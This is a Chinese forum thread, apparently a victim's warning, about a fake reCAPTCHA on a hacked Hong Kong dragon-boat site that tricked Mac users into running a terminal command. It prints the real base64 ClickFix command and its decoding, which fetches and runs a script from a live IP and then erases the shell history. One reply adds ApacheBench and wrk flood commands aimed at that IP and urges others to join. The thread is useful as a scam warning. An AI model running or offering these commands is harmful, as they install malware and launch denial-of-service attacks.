Genieliu111

一个 reCAPTCHA 把我骗到重装系统,分享出来给大家提个醒

  •  
  •   Genieliu111 · 16h 37m ago · 2979 views

    昨天想查一下今天龙舟赛的安排,就用 DuckDuckGo 快速搜了一下,点进一个网站。https://hkcdba.org/hkidbr (后面查又说是官方网站,是被黑了吗?)

    打开之后,弹出了标准的 "I'm not a robot" reCAPTCHA 验证。我很自然地就准备开始点图片验证,结果这次等来的压根不是图片,而是直接弹出了一张指引图,一步一步教我怎么打开终端,粘贴进去运行。应该是在我点击验证的时候,就已经把那段命令自动复制到我的剪贴板了。我当时也没多想,平时 github 里粘贴命令运行已经形成肌肉记忆了,鬼使神差地打开终端,直接粘贴,按下了回车。

    运行的命令是这样的

    echo 'I am not a robot - reCAPTCHA Verification ID: 432426' && echo 'ZXhwb3J0IFNSQ19VUkw9J2h0dHBzOi8vaGtjZGJhLm9yZy8nICYmIChjZCAvdG1wICYmIGN1cmwgLWtmc1NMICJodHRwOi8vNjIuNjAuMTU1LjE0My80ZjZiYjEyZjk4NDI4N2Q/Zm9yY2U9MSIgLW8gLk5lcWdnZiAmJiBiYXNoIC5OZXFnZ2YgJiYgcm0gLWYgLk5lcWdnZikgPiAvZGV2L251bGwgMj4mMSAmIGNsZWFyOyBwcmludGYgJ1wwMzNbM0onOyBoaXN0b3J5IC1kICQoaGlzdG9yeSAxIDI+L2Rldi9udWxsIHwgYXdrICd7cHJpbnQgJDF9JykgMj4vZGV2L251bGw7IGZjIC1wIC9kZXYvbnVsbCAyPi9kZXYvbnVsbDsgcHJpbnRmICdcbiAgXDAzM1szMm1ceGUyXHg5Y1x4OTMgVmVyaWZpY2F0aW9uIHN1Y2Nlc3NmdWxcMDMzWzBtXG5cbic=' | base64 -D 
    

    把里面的 base64 解析出来是这个

    export SRC_URL='https://hkcdba.org/' && (cd /tmp && curl -kfsSL "http://62.60.155.143/4f6bb12f984287d?force=1" -o .Neqggf && bash .Neqggf && rm -f .Neqggf) > /dev/null 2>&1 & clear; printf '\033[3J'; history -d $(history 1 2>/dev/null | awk '{print $1}') 2>/dev/null; fc -p /dev/null 2>/dev/null; printf '\n  \033[32m\xe2\x9c\x93 Verification successful\033[0m\n\n'%
    
    

    命令执行完,终端里立刻用绿色大字打印出了 "Verification successful"。回到网页并没有变化。

    但真正的异常才刚刚开始。没过几秒钟,系统突然弹出一个提示,说有一个后台任务正在运行,而且这个任务被伪装成了系统更新进程 "softwareupdate"。

    我赶紧去取消这个后台活动,但紧接着,没过多久屏幕上又弹出一个无法关闭的对话框,声称“系统软件已损坏”,要求我输入用户密码。

    这时候我已经完全清醒了,不敢再输入任何东西。那个弹窗关也关不掉,我赶紧电源键强制重启。

    重启之后问了下 deepseek ,然后赶紧把网络给掐了。后面查 plist ,发现有个伪装的 softwareupdate 的配置。然后今天预约了天才吧把全盘格式化重装了个系统。

    50 replies    2026-06-20 15:54:19 +08:00
    laminux29
        1
    laminux29  
       16h 32m ago   ❤️ 1
    有 AI 不用,有 Google 不用,非要去用什么山寨 DuckDuckGo ,这下中招了吧。
    burnbrid
        2
    burnbrid  
       16h 17m ago
    没装火绒吗?我刚访问了一下: http://62.60.155.143/4f6bb12f984287d?force=1 ,火绒直接拦截了。
    Genieliu111
        3
    Genieliu111  
    OP
       16h 11m ago
    @burnbrid 用的 Macbook ,没装杀毒软件。。。你是访问 https://hkcdba.org/hkidbr 就拦截了么?
    Genieliu111
        4
    Genieliu111  
    OP
       16h 8m ago
    @burnbrid 哦哦,是直接访问
    burnbrid
        5
    burnbrid  
       15h 57m ago
    这个 IP 是英国的,坏的很啊,给他压测一下。
    dingawm
        6
    dingawm  
       15h 49m ago
    所以那个是官方网站吗?你的搜索 query 是啥?
    UnluckyNinja
        7
    UnluckyNinja  
       15h 48m ago   ❤️ 4
    老骗局了,伪装成 recaptcha/turnstile 的钓鱼网站,如果你敢运行你不知道有什么实际作用的命令,尤其还是这种长到不能再可疑,那你怎么都会中招的

    几个常识:
    - 浏览器环境是独立的沙盒环境,任何需要你在沙盒之外操作什么的,你都应该打十二分精神,起八百个心眼,比如别人看不看的到,有没有可疑内容,有没有人做过( github 上的命令,都是因为有很多人跑过,帮你排雷你才能放心)。这种 BASE64 想藏什么都可以,给你下个原神也不是不行。
    - 装下广告屏蔽类工具吧,比如 ublock origin 扩展之类的,这类工具不光会屏蔽广告,也会屏蔽一些钓鱼木马网站。
    - 验证码最多就应当让你点来点去打几个字符,下次再看到让你再多费一丁点功夫的,直接关掉即可

    建议搜搜站里之前的面试钓鱼、telegram 假验证钓鱼(和你这个类似),多看看下次就长个心眼了
    burnbrid
        8
    burnbrid  
       15h 25m ago   ❤️ 1
    :~$ ab -r -n 10000 -c 10000 http://62.60.155.143/4f6bb12f984287d?force=1
    This is ApacheBench, Version 2.3 <$Revision: 1879490 $>
    Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
    Licensed to The Apache Software Foundation, http://www.apache.org/

    Benchmarking 62.60.155.143 (be patient)
    Completed 1000 requests
    Completed 2000 requests
    Completed 3000 requests
    Completed 4000 requests
    Completed 5000 requests
    Completed 6000 requests
    Completed 7000 requests
    Completed 8000 requests
    Completed 9000 requests
    Completed 10000 requests
    Finished 10000 requests


    Server Software: nginx/1.31.1
    Server Hostname: 62.60.155.143
    Server Port: 80

    Document Path: /4f6bb12f984287d?force=1
    Document Length: 0 bytes

    Concurrency Level: 10000
    Time taken for tests: 134.779 seconds
    Complete requests: 10000
    Failed requests: 13716
    (Connect: 0, Receive: 3429, Length: 6858, Exceptions: 3429)
    Non-2xx responses: 6863
    Total transferred: 2569942 bytes
    HTML transferred: 1387338 bytes
    Requests per second: 74.20 [#/sec] (mean)
    Time per request: 134779.155 [ms] (mean)
    Time per request: 13.478 [ms] (mean, across all concurrent requests)
    Transfer rate: 18.62 [Kbytes/sec] received

    Connection Times (ms)
    min mean[+/-sd] median max
    Connect: 0 3944 7177.1 2274 69668
    Processing: 214 9127 30084.5 316 134215
    Waiting: 0 306 922.9 279 35086
    Total: 449 13071 30168.8 2936 134215

    Percentage of the requests served within a certain time (ms)
    50% 2936
    66% 4905
    75% 7633
    80% 9884
    90% 27875
    95% 134036
    98% 134053
    99% 134150
    100% 134215 (longest request)

    帮你压测了一下,但是压不挂对方服务器啊。大家都来压测一下啊,把英国这 B 干死。
    UnluckyNinja
        9
    UnluckyNinja  
       15h 11m ago   ❤️ 1
    https://claude.ai/share/a154c68c-4e52-41fd-8884-53926ff8a6b1
    让 AI 分析了下,应该是专门针对的 mac ,而且确实是网站被挂马了,而不是浏览器、链接劫持之类的

    把浏览器 UA 修改成如下后可复现( F12 打开 devtools ,左上角设备模拟,尺寸-修改)
    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36
    burnbrid
        10
    burnbrid  
       15h 7m ago
    压测命令:wrk -t4 -c10000 -d60s --latency http://62.60.155.143/4f6bb12f984287d?force=1
    Running 1m test @ http://62.60.155.143/4f6bb12f984287d?force=1
    4 threads and 10000 connections
    Thread Stats Avg Stdev Max +/- Stdev
    Latency 352.55ms 194.11ms 2.00s 95.32%
    Req/Sec 548.10 342.78 1.78k 69.18%
    Latency Distribution
    50% 314.41ms
    75% 342.79ms
    90% 373.46ms
    99% 1.40s
    118740 requests in 1.00m, 42.39MB read
    Socket errors: connect 0, read 891, write 0, timeout 979
    Non-2xx or 3xx responses: 118730
    Requests/sec: 1977.67
    Transfer/sec: 723.02KB

    这逼的服务器怪能抗啊
    dem0ns
        11
    dem0ns  
       14h 19m ago
    你这命令行也只有 echo 和 base64 解码,没有复制完全吧
    UnluckyNinja
        12
    UnluckyNinja  
       14h 5m ago
    @dem0ns 就少了个最后的 | bash
    docx
        13
    docx  
       12h 9m ago via iPhone
    @laminux29 DuckDckGo 用的是 Bing 的数据。关键还是在于网页验证码不可能要求运行脚本。
    laminux29
        14
    laminux29  
       11h 53m ago
    @docx 我的意思是,正经的搜索引擎,会对网站 URL 做最基本的安全检测。很多常见的黑客工具网站、欺诈网站,在这个阶段就会被 ban
    xuejianxianzun
        15
    xuejianxianzun  
       11h 22m ago
    这个骗局我印象里几个月前就在网上看到过说明了。不过一个人机验证的事你能听他的去终端里执行任务,警惕性还需要提高
    docx
        16
    docx  
       11h 19m ago
    @laminux29 这是官方网站被黑导致的,与专门挂马的冒牌网站性质不同。Google 同样对这个域名收录并放在第一位。
    PeterTerpe
        17
    PeterTerpe  
       11h 15m ago via Android
    @laminux29 而且 DuckDuckGo 作为 TOR 浏览器的默认搜索引擎,以保护隐私著名,怎么就成不正经的搜索引擎了。
    stabc
        18
    stabc  
       10h 27m ago   ❤️ 3
    @laminux29 是不是你不懂的东西就是“山寨”
    laminux29
        19
    laminux29  
       8h 20m ago
    @docx

    Google 搜龙舟赛,自动推荐搜索关键字龙舟赛事 2026 ,点了这个关键字后,首先回应的是 AI 。AI 自动总结出相关结果,正常人只会去点击 Show More 去 看 AI 总结,谁还会浪费时间自己去点超链接?

    更何况这关键字,第一页搜索结果里,根本没有这黑客网站的 URL 。
    laminux29
        20
    laminux29  
       8h 18m ago
    @PeterTerpe 正经搜索引擎,搜龙舟赛,第一页推荐结果里会有这黑客网站嘛?
    Genieliu111
        21
    Genieliu111  
    OP
       8h 11m ago
    @dingawm 很简单的 query ,就是香港龙舟赛事
    laminux29
        22
    laminux29  
       8h 11m ago
    @stabc 你有什么高见?大家讨论一下?
    Genieliu111
        23
    Genieliu111  
    OP
       8h 5m ago
    @UnluckyNinja 已经装了 ublock origin 了,平时也挺注意隐私的,什么 firefox 的 strict mode 呀,https only ,cookies 退出就删除,甚至 DoH 都开了。结果这次鬼使神差地被骗到终端运行命令了。

    最近基本上都在用 claude code 写代码,而且默认允许运行命令,平时也用 AI 聊天拿到命令直接拿去运行。这次第一次遇到这种验证码,太大意了。
    Genieliu111
        24
    Genieliu111  
    OP
       8h 4m ago
    @UnluckyNinja 是的,避免误运行,把后面的 | bash 去掉了。
    Genieliu111
        25
    Genieliu111  
    OP
       7h 58m ago
    @docx 我拿去扔到 virustotal 也是检测不出来问题。
    antidoom
        26
    antidoom  
       7h 50m ago via Android
    你这属于是求生本能为零。
    iyiluo
        27
    iyiluo  
       7h 44m ago
    这么低级的骗局都能中招...
    Y25tIGxpdmlk
        28
    Y25tIGxpdmlk  
       7h 27m ago
    这种骗局骗不到机器人,只能骗到真人,你运行了,所以可以证明你确实是人类。没毛病啊
    HTravel
        29
    HTravel  
       6h 56m ago
    看到最后没绷住。都说了自己会 github ,那就默认是程序员了,居然装个 macos 系统要跑去天才吧一次?
    liuxue
        30
    liuxue  
       6h 38m ago
    @HTravel 我还是要去的,天才吧的网比我自己的快
    hefish
        31
    hefish  
       6h 35m ago
    @HTravel 自己安装会隐私泄露,天才吧不会。咳咳
    Genieliu111
        32
    Genieliu111  
    OP
       6h 10m ago
    @HTravel 人在香港酒店,网络 wifi 需要验证,而且速度慢。去天才吧不到半个小时搞定,是你怎么选?
    xiliuya
        33
    xiliuya  
       5h 50m ago
    啥玩意, 链接里是个 bash 脚本,但我粗略看了一下,好像命令格式都不太对,是 ios 系统下的 bash 脚本?
    貌似是把苹果的 com.apple.coreservices 里的文件发给 http://147.45.43.209:8133/api/t,具体看不懂,只能说头铁,不过貌似没有留后门,只是替换了 com.apple.update
    abc8678
        34
    abc8678  
       5h 34m ago via Android
    一两个月前在 b 站看过有人介绍这种骗术,没想到真有人试了
    kelvinaltajiin
        35
    kelvinaltajiin  
       5h 10m ago via Android
    @Genieliu111 为啥要去看萨莉亚?
    GeruzoniAnsasu
        36
    GeruzoniAnsasu  
       4h 35m ago
    虽然不合时宜,但你们光速 ab 的样子真的有点搞笑,像在砸日本车

    goodryb
        37
    goodryb  
       4h 30m ago
    脚本能随便执行吗,再加上这 base 命令,这还不提高警惕
    GeruzoniAnsasu
        38
    GeruzoniAnsasu  
       4h 23m ago
    这「日本车」砸得动才有鬼咯: https://imgur.com/3ok3dlS
    migim
        39
    migim  
       4h 11m ago
    和 t/1212003 一模一样的套路
    feng1w
        40
    feng1w  
       3h 47m ago
    这招也太狠了
    guanzhangzhang
        41
    guanzhangzhang  
       2h 12m ago
    @xuejianxianzun 是的,我记得之前看到的是啥知名网站被入侵了,被加上了这个验证导致很多电脑小白中招了
    HTravel
        42
    HTravel  
       1h 43m ago
    @Genieliu111 是我的话,即使我人在香港,顶着大太阳来回溜达苹果旗舰店也不是个舒服的事啊。我还不如用 3HK DIY 共享流量下载安装呢,这过程中还能用电视或其他平板看看视频什么的,都比去苹果店舒服。即使身边暂时没大流量卡,也可以到酒店下面便利店买个几十元的流量卡,一般都有 50G 流量,够折腾了。
    ranaanna
        43
    ranaanna  
       1h 38m ago
    緊急通知
    / 香港代表隊 / By HKCDBA
    中國香港龍舟總會網頁因受惡意程式入侵,請勿開啟,不便之處,敬請原諒。
    Genieliu111
        44
    Genieliu111  
    OP
       1h 26m ago
    @HTravel 但是我坐巴士只要一站,顺道去吃饭买东西,也不麻烦。
    Genieliu111
        45
    Genieliu111  
    OP
       1h 13m ago
    @ranaanna 现在是针对 Mac 用户攻击,我用 user-agent 改了下就能正常访问了,网站应该还是处于被攻击状态。
    Genieliu111
        46
    Genieliu111  
    OP
       1h 5m ago
    burnbrid
        47
    burnbrid  
       49 mins ago
    @GeruzoniAnsasu 什么意思?还不能给骗子压测一下了?像砸日本车的逻辑在哪里?
    PerFectTime
        48
    PerFectTime  
       42 mins ago
    @laminux29 #1 DuckDuckGo 山寨?真是笑掉我的大牙了 还幸灾乐祸的, 真的挺没品的. 看你的历史发言, 典型的我说的都是对的, 你们不认可你们就是错的, 那只能说祝你好运吧
    laminux29
        49
    laminux29  
       30 mins ago
    @PerFectTime

    1.现在就连百度的搜索结果,都是首推 AI 总结了,DuckDuckGo 这种连搜索结构都要参考别的搜索引擎,不是山寨是什么?就算回到几年前,没有 AI ,对于当时的搜索引擎的几大要素:爬虫、索引、分词、存储、排序,DuckDuckGo 有什么自主研发的技术?

    2.那不是幸灾乐祸,那是深度怀疑 OP 选品的逻辑。有着各种次时代的 AI 不去用,有着老牌谷歌不用,为什么要去用三无产品?

    3.我的历史发言,哪里有问题,麻烦你指出来,欢迎讨论。如果只是指责,拿不出任何技术证据,到底谁没品?
    Genieliu111
        50
    Genieliu111  
    OP
       8 mins ago
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   2570 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 105ms · UTC 08:02 · PVG 16:02 · LAX 01:02 · JFK 04:02
    ♥ Do have faith in what you're doing.